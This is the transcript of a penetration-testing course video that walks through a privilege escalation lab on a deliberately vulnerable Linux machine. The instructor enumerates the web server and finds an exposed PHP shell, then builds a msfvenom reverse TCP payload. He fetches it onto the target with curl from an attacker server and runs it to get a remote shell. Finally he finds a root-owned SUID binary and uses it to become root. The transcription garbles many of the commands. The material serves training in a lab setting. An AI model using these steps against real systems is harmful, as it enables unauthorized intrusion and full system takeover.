Privilege Escalation Walkthrough: Linux

Video Activity
Join over 3 million cybersecurity professionals advancing their career
Sign up with
or

Already have an account? Sign In »

Time
21 hours 43 minutes
Difficulty
Intermediate
CEU/CPE
22
Video Transcription
00:00
Welcome to part two of the privilege escalation lab. Now we're going to focus on the Lennox box.
00:08
So I hinted that it is a web based the foothold.
00:12
So we'll just go to this in a browser.
00:16
192168
00:19
one
00:20
1- five. Now
00:22
the name of this box is escalate.
00:25
So it's a value box. If you want to
00:29
research this with other walk throughs, I suggest that I'm just gonna do one exploitation path
00:36
to get to root. There are apparently 11 others,
00:40
So try all 11 if you want to.
00:43
Um But this is how you get better right through practice.
00:49
So Okay, so now I wanna I could use Derby on this.
00:56
There be
00:58
I told you I like to use what what web to see the technology. Of course we already know this is Apache,
01:03
but still what web?
01:10
Mhm.
01:11
See what we are.
01:18
Okay. Nothing, nothing. Earth shattering shattering here, we see is immune to.
01:25
So if I run Derby
01:34
and I specify for extension PHP
01:42
we see we have shelled out PHP. Well that makes things really easy.
01:49
Yeah,
01:53
So we're user six.
01:55
Okay, well let's get a foothold on this machine.
01:59
Okay. I said, I don't know. PHP shells aren't aren't the best. So I'm gonna use MSF venom
02:07
Payload is going to be Lennox x 86.
02:13
We can do interpreter. Let's let's mix things up here.
02:17
Reverse
02:19
TCP
02:21
L host
02:23
92,168,150
02:25
report equals for
02:30
4321
02:32
format itself.
02:37
Shell dot elf.
02:43
So because I'm using an interpreter, I now have to use
02:46
meh display
02:52
so I can split this.
02:54
I am going to do MSF console
03:05
now if you use multi handler right.
03:09
Use exploit multi handler
03:15
set
03:19
hey load
03:27
Sent. L host 1921681
03:31
50 set. Help port
03:36
4321
03:43
show options
03:46
looks right, You run and set this as a job in the background.
03:53
So now what would I need to do again is set up my
04:00
little server here,
04:11
don't specify another poor you can do that.
04:14
So now it's on Port 8888.
04:17
So what I can do from here
04:23
as I can
04:26
make sure that.
04:29
Okay this is on the desktop
04:33
curl http
04:36
192,168,150
04:40
8888 Shell
04:44
elf
04:45
output.
04:46
If you try to get this in this directory is not going to work. You don't have permission. So I always like to put things in temp
04:53
because it's globally readable. Writable executed. All right.
04:58
So first I have to ask that work
05:03
and we see the get request here.
05:08
So if you want to verify that we of course can do
05:13
LS.
05:14
And we see
05:15
that it's there. We did some odd this now
05:19
To let it execute commode 777.
05:24
Okay.
05:27
And now let's hope that
05:30
we can make this execute. It looks like it did.
05:34
All right.
05:39
So our sessions
05:44
session one.
05:46
Okay.
05:47
Let's drop into a shell.
05:49
Now you notice this is not the best show in the world.
05:53
So what I want to do is bin bash I
05:58
and that's much nicer isn't it?
06:00
So I want to look for sewage binaries. That's something that I like to do. I don't know what my password is. Right? So if I do Sudo L
06:10
while says no T T Y. Present
06:13
so
06:14
that this is even it looks nice. It's still a bad shell in my opinion.
06:17
Yeah,
06:17
but let's try to find sewage binaries
06:24
and this is how you do it
06:28
as soo ID
06:30
type
06:31
F.
06:33
And again, I think the bible for this or the manual is Got Milks
06:40
Lennox privilege escalation guide.
06:53
We'll see something interesting towards the end here.
07:01
Okay. I see something called Shell.
07:05
Is this a sewage binary?
07:08
And who owns it?
07:10
Yeah,
07:13
we see Root owns this and we see a little less
07:15
here. Okay.
07:17
And we see that we can execute it.
07:21
So what if we do that?
07:40
You can always see what this is. File. Shell
07:46
Elf
07:46
do strings if you want,
07:50
see what's going on in here
08:03
and we can always run this.
08:09
It's an arrow root.
08:13
So that's only one way. There are many, many others. And I would highly recommend
08:18
that you explore all those other ways to escalate privileges on this box and that's why I chose it because there's just so many different ways to do it.
08:26
So go ahead and find your own way to get to root on this box.
08:31
Good luck.
Up Next
Offensive Penetration Testing

The Offensive Penetration Testing course opens the doors to those wanting to begin a penetration testing career. This course will prepare learners to begin their pentesting career journey by understanding what tools, techniques, and resources are available for someone starting out in offensive penetration testing.

Instructed By